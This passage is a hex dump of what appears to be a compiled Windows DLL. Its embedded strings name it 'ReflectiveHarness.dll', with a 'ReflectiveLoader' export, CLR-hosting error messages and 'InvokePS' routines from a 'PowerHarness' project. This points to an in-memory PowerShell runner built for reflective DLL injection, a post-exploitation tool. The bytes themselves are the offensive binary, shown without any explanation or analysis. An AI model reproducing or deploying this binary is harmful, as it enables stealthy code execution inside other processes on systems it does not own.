e00000000000000d8470180010000001400000000000000685a0180010000005600000000000000e0470180010000001500000000000000785a0180010000005700000000000000885a0180010000009800000000000000985a0180010000008c00000000000000a85a0180010000009f00000000000000b85a018001000000a800000000000000e8470180010000001600000000000000c85a0180010000005800000000000000f0470180010000001700000000000000d85a018001000000590000000000000018490180010000003c00000000000000e85a0180010000008500000000000000f85a018001000000a700000000000000085b0180010000007600000000000000185b0180010000009c0000000000000000480180010000001900000000000000285b0180010000005b0000000000000048480180010000002200000000000000385b0180010000006400000000000000485b018001000000be00000000000000585b018001000000c300000000000000685b018001000000b000000000000000785b018001000000b800000000000000885b018001000000cb00000000000000985b018001000000c70000000000000008480180010000001a000
00000000000a85b0180010000005c000000000000004853018001000000e300000000000000b85b018001000000c200000000000000d05b018001000000bd00000000000000e85b018001000000a600000000000000005c018001000000990000000000000010480180010000001b00000000000000185c0180010000009a00000000000000285c0180010000005d00000000000000d0480180010000003300000000000000385c0180010000007a0000000000000038490180010000004000000000000000485c0180010000008a00000000000000f8480180010000003800000000000000585c018001000000800000000000000000490180010000003900000000000000685c018001000000810000000000000018480180010000001c00000000000000785c0180010000005e00000000000000885c0180010000006e0000000000000020480180010000001d00000000000000985c0180010000005f00000000000000e0480180010000003500000000000000a85c0180010000007c0000000000000038480180010000002000000000000000b85c018001000000620000000000000028480180010000001e00000000000000c85c0180010000006000000000000000d8480180010000003400000000000000d85c0180010000009e00000000000000f05c0180010000007b0000000000000070480180010000002700000000000000085d0180010000006900000000000000185d0180010000006f00000000000000285d0180010000000300000000000000385d018001000000e200000000000000485d0180010000009000000000000000585d018001000000a100000000000000685d018001000000b200000000000000785d018001000000aa00000000000000885d0180010000004600000000000000985d01800100000070000000000000006100720000000000620067000000000063006100000000007a0068002d004300480053000000000063007300000000006400610000000000640065000000000065006c000000000065006e000000000065007300000000006600690000000000660072000000000068006500000000006800750000000000690073000000000069007400000000006a006100000000006b006f00000000006e006c00000000006e006f000000000070006c0000000000700074000000000072006f00000000007200750000000000680072000000000073006b000000000073007100000000007300760000000000740068000000000074007200000000007500720000000000690064000000000075006b0000000000620065000000000073006c000000000065007400000000006c007600000000006c0074000000000066006100000000007600690000000000680079000000000061007a000000000065007500000000006d006b000000000061006600000000006b0061000000000066006f000000000068006900000000006d007300000000006b006b00000000006b00790000000000730077000000000075007a0000000000740074000000000070006100000000006700750000000000740061000000000074006500000000006b006e00000000006d0072000000000073006100000000006d006e000000000067006c00000000006b006f006b000000730079007200000064006900760000000000000000000000610072002d0053004100000000000000620067002d0042004700000000000000630061002d0045005300000000000000630073002d0043005a00000000000000640061002d0044004b00000000000000640065002d004400450000000000000065006c002d0047005200000000000000660069002d0046004900000000000000660072002d0046005200000000000000680065002d0049004c00000000000000680075002d0048005500000000000000690073002d0049005300000000000000690074002d00490054000000000000006e006c002d004e004c000000000000006e0062002d004e004f0000000000000070006c002d0050004c00000000000000700074002d004200520000000000000072006f002d0052004f00000000000000720075002d0052005500000000000000680072002d004800520000000000000073006b002d0053004b00000000000000730071002d0041004c00000000000000730076002d0053004500000000000000740068002d0054004800000000000000740072002d0054005200000000000000750072002d0050004b00000000000000690064002d004900440000000000000075006b002d0055004100000000000000620065002d004200590000000000000073006c002d0053004900000000000000650074002d00450045000000000000006c0076002d004c0056000000000000006c0074002d004c005400000000000000660061002d0049005200000000000000760069002d0056004e000000
00000000680079002d0041004d0000000000000061007a002d0041005a002d004c00610074006e0000000000650075002d00450053000000000000006d006b002d004d004b0000000000000074006e002d005a004100000000000000780068002d005a0041000000000000007a0075002d005a004100000000000000610066002d005a0041000000000000006b0061002d004700450000000000000066006f002d0046004f00000000000000680069002d0049004e000000000000006d0074002d004d005400000000000000730065002d004e004f000000000000006d0073002d004d0059000000000000006b006b002d004b005a000000000000006b0079002d004b004700000000000000730077002d004b00450000000000000075007a002d0055005a002d004c00610074006e0000000000740074002d005200550000000000000062006e002d0049004e00000000000000700061002d0049004e00000000000000670075002d0049004e00000000000000740061002d0049004e00000000000000740065002d0049004e000000000000006b006e002d0049004e000000000000006d006c002d0049004e000000000000006d0072002d0049004e00000000000000730061002d0049004e000000000000006d006e002d004d004e00000000000000630079002d004700420000000000000067006c002d00450053000000000000006b006f006b002d0049004e00000000007300790072002d0053005900000000006400690076002d004d00560000000000710075007a002d0042004f00000000006e0073002d005a0041000000000000006d0069002d004e005a00000000000000610072002d0049005100000000000000640065002d004300480000000000000065006e002d0047004200000000000000650073002d004d005800000000000000660072002d0042004500000000000000690074002d00430048000000000000006e006c002d00420045000000000000006e006e002d004e004f00000000000000700074002d0050005400000000000000730072002d00530050002d004c00610074006e0000000000730076002d004600490000000000000061007a002d0041005a002d004300790072006c0000000000730065002d00530045000000000000006d0073002d0042004e0000000000000075007a002d0055005a002d004300790072006c0000000000710075007a002d004500430000000000610072002d00450047000000000000007a0068002d0048004b00000000000000640065002d004100540000000000000065006e002d0041005500000000000000650073002d0045005300000000000000660072002d0043004100000000000000730072002d00530050002d004300790072006c0000000000730065002d0046004900000000000000710075007a002d005000450000000000610072002d004c0059000000000000007a0068002d0053004700000000000000640065002d004c00550000000000000065006e002d0043004100000000000000650073002d0047005400000000000000660072002d0043004800000000000000680072002d004200410000000000000073006d006a002d004e004f0000000000610072002d0044005a000000000000007a0068002d004d004f00000000000000640065002d004c00490000000000000065006e002d004e005a00000000000000650073002d0043005200000000000000660072002d004c005500000000000000620073002d00420041002d004c00610074006e000000000073006d006a002d005300450000000000610072002d004d00410000000000000065006e002d0049004500000000000000650073002d0050004100000000000000660072002d004d004300000000000000730072002d00420041002d004c00610074006e000000000073006d0061002d004e004f0000000000610072002d0054004e0000000000000065006e002d005a004100000000000000650073002d0044004f00000000000000730072002d00420041002d004300790072006c000000000073006d0061002d005300450000000000610072002d004f004d0000000000000065006e002d004a004d00000000000000650073002d005600450000000000000073006d0073002d004600490000000000610072002d005900450000000000000065006e002d0043004200000000000000650073002d0043004f0000000000000073006d006e002d004600490000000000610072002d005300590000000000000065006e002d0042005a00000000000000650073002d0050004500000000000000610072002d004a004f0000000000000065006e002d0054005400000000000000650073002d0041005200000000000000610072002d004c00420000000000000065006e002d005a005700000000000000650073002d0045004300000000000000610072002d0
04b00570000000000000065006e002d0050004800000000000000650073002d0043004c00000000000000610072002d0041004500000000000000650073002d0055005900000000000000610072002d0042004800000000000000650073002d0050005900000000000000610072002d0051004100000000000000650073002d0042004f00000000000000650073002d0053005600000000000000650073002d0048004e00000000000000650073002d004e004900000000000000650073002d00500052000000000000007a0068002d00430048005400000000007300720000000000610066002d007a006100000000000000610072002d0061006500000000000000610072002d0062006800000000000000610072002d0064007a00000000000000610072002d0065006700000000000000610072002d0069007100000000000000610072002d006a006f00000000000000610072002d006b007700000000000000610072002d006c006200000000000000610072002d006c007900000000000000610072002d006d006100000000000000610072002d006f006d00000000000000610072002d0071006100000000000000610072002d0073006100000000000000610072002d0073007900000000000000610072002d0074006e00000000000000610072002d007900650000000000000061007a002d0061007a002d006300790072006c000000000061007a002d0061007a002d006c00610074006e0000000000620065002d0062007900000000000000620067002d006200670000000000000062006e002d0069006e00000000000000620073002d00620061002d006c00610074006e0000000000630061002d0065007300000000000000630073002d0063007a00000000000000630079002d0067006200000000000000640061002d0064006b00000000000000640065002d0061007400000000000000640065002d0063006800000000000000640065002d0064006500000000000000640065002d006c006900000000000000640065002d006c0075000000000000006400690076002d006d0076000000000065006c002d006700720000000000000065006e002d006100750000000000000065006e002d0062007a0000000000000065006e002d006300610000000000000065006e002d006300620000000000000065006e002d006700620000000000000065006e002d006900650000000000000065006e002d006a006d0000000000000065006e002d006e007a0000000000000065006e002d007000680000000000000065006e002d007400740000000000000065006e002d007500730000000000000065006e002d007a00610000000000000065006e002d007a007700000000000000650073002d0061007200000000000000650073002d0062006f00000000000000650073002d0063006c00000000000000650073002d0063006f00000000000000650073002d0063007200000000000000650073002d0064006f00000000000000650073002d0065006300000000000000650073002d0065007300000000000000650073002d0067007400000000000000650073002d0068006e00000000000000650073002d006d007800000000000000650073002d006e006900000000000000650073002d0070006100000000000000650073002d0070006500000000000000650073002d0070007200000000000000650073002d0070007900000000000000650073002d0073007600000000000000650073002d0075007900000000000000650073002d0076006500000000000000650074002d0065006500000000000000650075002d0065007300000000000000660061002d0069007200000000000000660069002d006600690000000000000066006f002d0066006f00000000000000660072002d0062006500000000000000660072002d0063006100000000000000660072002d0063006800000000000000660072002d0066007200000000000000660072002d006c007500000000000000660072002d006d00630000000000000067006c002d0065007300000000000000670075002d0069006e00000000000000680065002d0069006c00000000000000680069002d0069006e00000000000000680072002d0062006100000000000000680072002d0068007200000000000000680075002d0068007500000000000000680079002d0061006d00000000000000690064002d0069006400000000000000690073002d0069007300000000000000690074002d0063006800000000000000690074002d00690074000000000000006a0061002d006a0070000000000000006b0061002d00670065000000000000006b006b002d006b007a000000000000006b006e002d0069006e000000000000006b006f006b002d0069006e00000000006b006f002d006b0072000000000000006b0079002d006b
0067000000000000006c0074002d006c0074000000000000006c0076002d006c0076000000000000006d0069002d006e007a000000000000006d006b002d006d006b000000000000006d006c002d0069006e000000000000006d006e002d006d006e000000000000006d0072002d0069006e000000000000006d0073002d0062006e000000000000006d0073002d006d0079000000000000006d0074002d006d0074000000000000006e0062002d006e006f000000000000006e006c002d00620065000000000000006e006c002d006e006c000000000000006e006e002d006e006f000000000000006e0073002d007a006100000000000000700061002d0069006e0000000000000070006c002d0070006c00000000000000700074002d0062007200000000000000700074002d0070007400000000000000710075007a002d0062006f0000000000710075007a002d006500630000000000710075007a002d00700065000000000072006f002d0072006f00000000000000720075002d0072007500000000000000730061002d0069006e00000000000000730065002d0066006900000000000000730065002d006e006f00000000000000730065002d007300650000000000000073006b002d0073006b0000000000000073006c002d007300690000000000000073006d0061002d006e006f000000000073006d0061002d00730065000000000073006d006a002d006e006f000000000073006d006a002d00730065000000000073006d006e002d00660069000000000073006d0073002d006600690000000000730071002d0061006c00000000000000730072002d00620061002d006300790072006c0000000000730072002d00620061002d006c00610074006e0000000000730072002d00730070002d006300790072006c0000000000730072002d00730070002d006c00610074006e0000000000730076002d0066006900000000000000730076002d0073006500000000000000730077002d006b0065000000000000007300790072002d007300790000000000740061002d0069006e00000000000000740065002d0069006e00000000000000740068002d007400680000000000000074006e002d007a006100000000000000740072002d0074007200000000000000740074002d007200750000000000000075006b002d0075006100000000000000750072002d0070006b0000000000000075007a002d0075007a002d006300790072006c000000000075007a002d0075007a002d006c00610074006e0000000000760069002d0076006e00000000000000780068002d007a0061000000000000007a0068002d00630068007300000000007a0068002d00630068007400000000007a0068002d0063006e000000000000007a0068002d0068006b000000000000007a0068002d006d006f000000000000007a0068002d00730067000000000000007a0068002d00740077000000000000007a0075002d007a00610000000000000000000000000000000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f003123534e414e00003123494e440000003123494e460000003123514e414e0000410000001700000043004f004e004f0055005400240000005300740061007200740069006e006700200049006e0076006f006b00650020004d00610069006e0000000000000000004861726e657373004861726e6573732e4861726e6573730043004c00520043007200650061007400650049006e007300740061006e006300650020006600610069006c0065006400200000000000000047006f007400200049006e007300740061006c006c0065006400520075006e00740069006d006500730000000000000045006e0075006d00650072006100740069006e006700000044006f006e006500200065006e0075006d00650072006100740069006e00670000000000000000000000000000000000490043004c0052004d0065007400610048006f00730074003a003a00470065007400520075006e00740069006d00650020006600610069006c0065006400200000000000000000000000000000000000490043004c005200520075006e00740069006d00650049006e0066006f003a003a00490073004c006f0061006400610062006c00650020006600610069006c0065006400200000002e004e00450054002000720075006e00740069006d0065002000630061006e006e006f00740020006200650020006c006f0061006400650064000a00000000000000000000000000490043004c005200520075006e0074006
9006d00650049006e0066006f003a003a0047006500740049006e00740065007200660061006300650020006600610069006c0065006400200000000000000043004c00520020006600610069006c0065006400200074006f0020007300740061007200740020000000000000000000490043006f007200520075006e00740069006d00650048006f00730074003a003a00470065007400440065006600610075006c00740044006f006d00610069006e0020006600610069006c0065006400200000000000000000000000000000004600610069006c0065006400200074006f0020006700650074002000640065006600610075006c007400200041007000700044006f006d00610069006e00200000000000000000004600610069006c0065006400200074006f0020006c006f00610064002000740068006500200061007300730065006d0062006c0079002000000000000000000000000000000000004600610069006c0065006400200074006f002000670065007400200074006800650020005400790070006500200069006e007400650072006600610063006500200000002000000049006e0076006f006b00650050005300000000000000000043006c00650061006e0069006e0067002000550070000000520065007400750072006e0069006e0067002000660072006f006d00200049006e0076006f006b0065004d00610069006e0000000000000049006e00200049006e0076006f006b0065004d006500740068006f006400000053006100660065004100720072006100790050007500740045006c0065006d0065006e00740020006600610069006c006500640020000000430061006c006c0069006e006700200049006e0076006f006b0065004d0065006d006200650072005f00330000000000520045007400750072006e00650064002000660072006f006d00200049006e0076006f006b0065004d0065006d006200650072005f00330000000000000000004600610069006c0065006400200074006f00200069006e0076006f006b006500200049006e0076006f006b0065005000530020000000000049006e0076006f006b0069006e00670020004d00610069006e002000540068007200650061006400000000000000000049006e00200044006c006c0020004d00610069006e00000022672fcb3aabd2119c4000c04fa30a3ed2d139bd2fba6a4889b0b4b0cb4668918d1880928e0e6748b30c7fa83884e8de23672fcb3aabd2119c4000c04fa30a3e9edb32d3b3b925418207a14884f53216dc96f605292b6336ad8bc4389cf2a71322059319060000009468010000000000000000000d000000c46801004800000000000000010000002205931908000000a4670100000000000000000011000000e46701003000000000000000010000000000000000000000700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002080018001000000000000000000000000000000000000005253445382a8e6ced804554c9d5c68f91814d79001000000433a5c55736572735c526963685c446f63756d656e74735c56697375616c2053747564696f20323031335c50726f6a656374735c506f7765724861726e6573735c7836345c52656c656173655c5265666c6563746976654861726e6573732e7064620000000000009300000093000000030000000000000030da01000000000000000000ffffffff000000004000000088650100000000000000000000000000000000000000000001000000a065010000000000000000006065010000000000000000000000000001000000000000000000000008da0100d8650100b065010000000000000000000000000000000000000000000000000002000000f0650100000000000000000008660100606501000000000000000000000000000000000008da01000100000000000000ffffffff0000000040000000d865010000000000000000000000000001000000000000000000000058da01005866010030660100000000000000000000000000000000000000000000000000010000007066010000000000000000008066010000000000000000000000000058da01000000000000000000ffffffff00000000400000005866010000000000000000000000000001000000000000000000000030da010088650100a86601000000000000000000000000000000000001000000000000000000000078da0100f8660100d06601000000000000000000000000000000000000000000000000000200000010670100000000000000000028670100606501000000000000000000000000000000000078da01000100000000000000ffffffff0000000040000000f866
01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010a04000a3407000a320670193c0b002b743a0027643900233438001601340008f006e0045000002cec00003064010092010000ffffffffc0ec000000000000ccec000001000000d8ec000001000000e4ec000003000000f0ec000004000000fcec00000400000008ed00000600000014ed000090100000ffffffff041100000000000009110000010000001a1100000200000047110000010000005b110000030000005f1100000400000071110000050000009e11000004000000b211000006000000b711000007000000e115000006000000f21500000400000024160000030000003416000001000000661600000000000077160000ffffffff19350b0027742100236420001f341f0013011a0008f006e0045000002cec000008640100ca000000ffffffff20ed0000000000002ced00000000000038ed00000200000044ed00000300000050ed0000040000005ced0000c0160000fffffffffc160000000000000d170000010000004b170000000000005f17000002000000891700000300000094170000040000009f170000050000007e18000004000000891800000300000094180000020000009f18000000000000d1180000ffffffff01040100044200000104010004620000010e04000e720af008e0063021650a006574060017d4040012c405000a64070005540f00c0190000ce1900003c69010021000000c0190000ce1900003c690100192809351a64100016340f0012330d9209e0077006500000c02e000001000000141f00005f1f0000010000005f1f0000410000000104010004820000010000000106020006720230110a02000a3206303055000001000000d92300000024000068ed000000000000091a06001a3411001a9216e01470136030550000010000000d250000d92500008eed0000dd25000011190a0019740a001964090019340800193215f013e011c03055000001000000562600001c270000d7ed000000000000010f06000f6407000f3406000f320b7001120800125409001234080012320ee00c700b60192203001101b600025000004c750000a00500000918020018b214303055000001000000a72b0000c72b0000ebed0000c72b00000106020006720250011d0c001d740b001d640a001d5409001d3408001d3219f017e015c001160a0016540c0016340b00163212f010e00ec00c700b60010f06000f640c000f340b000f720b700114080014640c0014540b0014340a0014721070000000000104010004120000011206001274100012340f0012b20b50010000000109010009620000192f09001e74bb001e64ba001e34b9001e01b600105000004c750000a00500000114080014640a0014540900143408001452107001140600146407001434060014321070111304001334070013320f703055000002000000d83b0000053c000031ee000000000000173c00004e3c00004aee000000000000110a04000a3406000a3206703055000002000000b73d0000c13d000031ee000000000000d63d0000fd3d00004aee0000000000000114080014640800145407001434060014321070111c0a001c640f001c340e001c7218f016e014d012c010703055000001000000674200007b43000063ee00000000000011200d0020c41f0020741e0020641d0020341c002001180019f017e015d0000030550000020000002c4400005f44000087ee00000000000068440000fb46000087ee000000000000010f06000f640b000f340a000f520b70010d04000d3409000d3206500106020006320230010a04000a340d000a72067001080400087204700360023001190a0019740900196408001954070019340600193215e0010a04000a3406000a320670011c0c001c6410001c540f001c340e001c7218f016e014d012c01070192d0b001b6451001b5450001b344f001b014a0014f012e0107000004c75000040020000000000000100000019130900130112000cf00ae008d006c0047003600230000030550000020000005e6d0000836d0000a2ee0000836d00005e6d0000fe6d000096ef0000000000000107030007420350023000001922080022521ef01ce01ad018c016701560143030550000020000005f6f0000f66f00002cf00000f66f0000276f00001d70000042f000000000000001210b0021341f002101160015f013e011d00fc00d700c600b50000001170a001754120017341000179213f011e00fc00d700c6009150800157408001564070015340600153211e03055000001000000a46900000e6a0000010000000e6a000001190a001934170019d215f013e011d00fc00d700c600b50090d01000d4200003055000001000000f15f00000260000014f0000004600000011c0c001c640c001c540b001c340a001c3218f016e014d
012c0107001180a0018640e0018540d0018340c00187214e012c0107009190a0019740c0019640b0019340a00195215f013e011d03055000001000000ba6a0000556c000001000000596c00000904010004420000305500000100000021750000257500000100000025750000090401000442000030550000010000000275000006750000010000000675000001000000110602000652023030550000010000005c760000a47600006bf000000000000001140800146406001454050014340400141210700106020006520230011d0c001d7411001d6410001d540f001d340e001d9219f017e015d0191b06000c01110005700460035002304c75000070000000011c0c001c6412001c5411001c3410001c9218f016e014d012c0107001190a0019740d0019640c0019540b0019340a00197215e01918050009e2057004600350023000004c75000060000000191d06000ef207e005700460035002304c750000700000000100000011100600107407001034060010320ce03055000001000000de8700000188000084f0000000000000010602000632025011060200063202303055000001000000a78b0000bd8b0000a1f0000000000000110a04000a3407000a32067030550000010000009e8f0000f58f0000baf000000000000011190a0019e40b0019740a001964090019340800195215f03055000001000000579100000e920000baf000000000000019250a001654110016341000167212f010e00ec00c700b604c75000038000000192b07001a74b4001a34b3001a01b0000b5000004c75000070050000090a04000a3406000a32067030550000010000006d950000a0950000e0f00000a095000011170a0017640f0017340e00175213f011e00fd00dc00b70305500000100000058970000df97000000f10000000000000107020007019b00010000000100000001000000010f06000f640b000f340a000f720b70191e08000f920bf009e007c005700460035002304c7500004800000001040100044200000112060012e413001274110012d20b500104010004220000191c04000d3414000df206704c75000078000000191a04000bf20470036002304c75000078000000191f06001101110005700460033002504c750000700000000105020005340100010e02000e320a30010a02000a320630010f06000f6411000f3410000fd20b70192d0d451f7412001b6411001734100013430e920af008e006d004c0025000004c75000048000000010f06000f640f000f340e000fb20b70192d0d351f7410001b640f0017340e0013330e720af008e006d004c0025000004c750000300000000110060010640d0010340c0010920c7011190a0019740c0019640b0019340a00195215f013e011d03055000002000000b0b60000f4b600001ef10000000000007db600000db7000046f1000000000000110f06000f6409000f3408000f520b70305500000100000056b70000c8b700005ff1000000000000011006001064110010b209e00770065011060200063202703055000001000000e1b80000f7b80000a1f0000000000000192d0c001f7415001f6414001f3412001fb218f016e014d012c010504c75000058000000192a0b001c341e001c01140010f00ee00cd00ac008700760065000004c75000098000000192a0b001c3421001c01180010f00ee00cd00ac008700760065000004c750000b00000001111060011340a0011320de00b700a603055000001000000a7d80000ebd80000c0f10000000000001115080015340b00153211f00fe00dc00b700a6030550000010000008ed90000c1d9000078f100000000000019360b00253473032501680310f00ee00cd00ac008700760065000004c750000301b0000110f04000f3407000f320b703055000001000000b3e20000bde200008ff10000000000000100000001180a00186408001854070018340600181214e012c0107001100600107407001034060010320ce011150800157408001564070015340600153211f030550000010000001fe600003ee60000a7f100000000000001190a0019740f0019640e0019540d0019340c00199215e01111060011340a0011320de00b700a60305500000100000077ea00009bea0000c0f100000000000000000000702000000000000060740100000000000000000000000000000000000100000070740100000000000000000000000000e0d9010000000000ffffffff000000002000000030200000000000000000000000000000000000007822000000000000b87401000000000000000000000000000000000002000000d0740100f87401000000000000000000000000001000000008da010000000000ffffffff0000000018000000542200000000000000000000000000000000000030da010000000000ffffffff0000000018000000c8370000000000000000000000000000000000004c
6000000000000040750100000000000000000000000000000000000200000058750100f87401000000000000000000000000000000000078da010000000000ffffffff00000000180000002860000000000000000000000000000000000000abefc35500000000b2750100010000000100000001000000a8750100ac750100b0750100c0190000c875010000005265666c6563746976654861726e6573732e646c6c005265666c6563746976654c6f6164657200000000307601000000000000000000e678010000000100587801000000000000000000f478010028020100b078010000000000000000001679010080020100000000000000000000000000000000000000000000000000c078010000000000d678010000000000d47d010000000000c67d010000000000b67d010000000000a27d010000000000927d010000000000807d010000000000707d0100000000005c7d0100000000004c7d010000000000227901000000000032790100000000003e7901000000000054790100000000006a79010000000000767901000000000088790100000000009e79010000000000ae79010000000000be79010000000000ca79010000000000d679010000000000f079010000000000fe79010000000000127a010000000000247a010000000000387a010000000000547a010000000000647a010000000000727a010000000000887a0100000000009a7a010000000000ac7a010000000000bc7a010000000000ca7a010000000000e27a010000000000f47a0100000000000a7b010000000000247b0100000000003a7b010000000000547b0100000000006e7b010000000000887b0100000000009c7b010000000000b07b010000000000cc7b010000000000ea7b010000000000127c0100000000001a7c0100000000002e7c010000000000427c0100000000004e7c0100000000005c7c0100000000006a7c010000000000747c010000000000887c010000000000947c010000000000a07c010000000000b67c010000000000ce7c010000000000e67c010000000000f87c010000000000027d0100000000000e7d0100000000001a7d0100000000002c7d0100000000003a7d0100000000000000000000000000160000000000008006000000000000801a00000000000080150000000000008008000000000000800f0000000000008010000000000000809b0100000000008009000000000000800200000000000080000000000000000002790100000000000000000000000000fd034f75747075744465627567537472696e67570000e70043726561746554687265616400004b45524e454c33322e646c6c00004f4c4541555433322e646c6c00000000434c52437265617465496e7374616e6365006d73636f7265652e646c6c0056024765744c6173744572726f7200001e066c7374726c656e410000d4034d756c746942797465546f576964654368617200dd055769646543686172546f4d756c74694279746500b5034c6f63616c4672656500ce01476574436f6d6d616e644c696e654100140247657443757272656e74546872656164496400002501456e636f6465506f696e74657200ff004465636f6465506f696e746572003c0348656170467265650000380348656170416c6c6f6300b50452746c4c6f6f6b757046756e6374696f6e456e7472790000bb0452746c556e77696e64457800b70452746c5063546f46696c654865616465720044045261697365457863657074696f6e00006a034973446562756767657250726573656e74007003497350726f636573736f724665617475726550726573656e740019055365744c6173744572726f72000057014578697450726f63657373006c024765744d6f64756c6548616e646c654578570000a40247657450726f63416464726573730000a90247657450726f63657373486561700000c70247657453746448616e646c650000450247657446696c655479706500060144656c657465437269746963616c53656374696f6e00c50247657453746172747570496e666f570068024765744d6f64756c6546696c654e616d6541000030045175657279506572666f726d616e6365436f756e74657200100247657443757272656e7450726f63657373496400dd0247657453797374656d54696d65417346696c6554696d65002e02476574456e7669726f6e6d656e74537472696e6773570000a30146726565456e7669726f6e6d656e74537472696e67735700ae0452746c43617074757265436f6e7465787400bc0452746c5669727475616c556e77696e6400009205556e68616e646c6564457863657074696f6e46696c74657200005205536574556e68616e646c6564457863657074696f6e46696c746572005103496e697469616c697a65437269746963616c53656374696f6e416e645370696e436f756e74006105536c6
56570000f0247657443757272656e7450726f636573730070055465726d696e61746550726f6365737300008205546c73416c6c6f6300008405546c7347657456616c7565008505546c7353657456616c7565008305546c7346726565006d024765744d6f64756c6548616e646c6557000041034865617053697a650000f105577269746546696c650069024765744d6f64756c6546696c654e616d655700002901456e746572437269746963616c53656374696f6e0000a5034c65617665437269746963616c53656374696f6e00007503497356616c6964436f64655061676500aa0147657441435000008d024765744f454d43500000b9014765744350496e666f00aa034c6f61644c69627261727945785700003f03486561705265416c6c6f6300cc02476574537472696e675479706557000099034c434d6170537472696e675700009801466c75736846696c65427566666572730000e201476574436f6e736f6c6543500000f401476574436f6e736f6c654d6f64650000300553657453746448616e646c6500000c0553657446696c65506f696e74657245780000f0055772697465436f6e736f6c6557007f00436c6f736548616e646c6500c20043726561746546696c6557000000000000000000000000000000000000000000000000000000000000000a0000000000000004000280000000000000000000000000102100800100000032a2df2d992b0000cd5d20d266d4ffff759800007398000000000000000000000100000016000000020000000200000003000000020000000400000018000000050000000d0000000600000009000000070000000c000000080000000c000000090000000c0000000a000000070000000b000000080000000c000000160000000d000000160000000f00000002000000100000000d00000011000000120000001200000002000000210000000d0000003500000002000000410000000d00000043000000020000005000000011000000520000000d000000530000000d0000005700000016000000590000000b0000006c0000000d0000006d00000020000000700000001c00000072000000090000000600000016000000800000000a000000810000000a00000082000000090000008300000016000000840000000d00000091000000290000009e0000000d000000a100000002000000a40000000b000000a70000000d000000b700000011000000ce00000002000000d70000000b000000180700000c0000000c00000008000000ffffffff000000000000000000000000ffffffffffffffff800a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000100000002000000000000000000000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a8008001000000000000000000000001000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000010000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000010000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000100000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000004300000000000000000000009014018001000000941401800100000098140180010000009c14018001000000a014018001000000a414018001000000a814018001000000
ac14018001000000b414018001000000c014018001000000c814018001000000d814018001000000e414018001000000f014018001000000fc140180010000000015018001000000041501800100000008150180010000000c150180010000001015018001000000141501800100000018150180010000001c150180010000002015018001000000241501800100000028150180010000003015018001000000381501800100000044150180010000004c150180010000000c1501800100000054150180010000005c1501800100000064150180010000007015018001000000801501800100000088150180010000009815018001000000a415018001000000a815018001000000b015018001000000c015018001000000d8150180010000000100000000000000e815018001000000f015018001000000f81501800100000000160180010000000816018001000000101601800100000018160180010000002016018001000000301601800100000040160180010000005016018001000000681601800100000080160180010000009016018001000000a816018001000000b016018001000000b816018001000000c016018001000000c816018001000000d016018001000000d816018001000000e016018001000000e816018001000000f016018001000000f81601800100000000170180010000000817018001000000181701800100000030170180010000004017018001000000c81601800100000050170180010000006017018001000000701701800100000080170180010000009817018001000000a817018001000000c017018001000000d417018001000000dc17018001000000e817018001000000001801800100000028180180010000004018018001000000a08701800100000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000100000001000000000000000000000000000000000000000000000000000000109201800100000000000000000000000000000000000000a0230180010000003028018001000000b029018001000000d0840180010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101010101010101010101010101010101010101010101010101000000000000020202020202020202020202020202020202020202020202020200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006162636465666768696a6b6c6d6e6f707172737475767778797a0000000000004142434445464748494a4b4c4d4e4f505152535455565758595a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010101010101010101010101010101010101010101010101010100000000000002020202020202020202020202020202020202020202020202020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
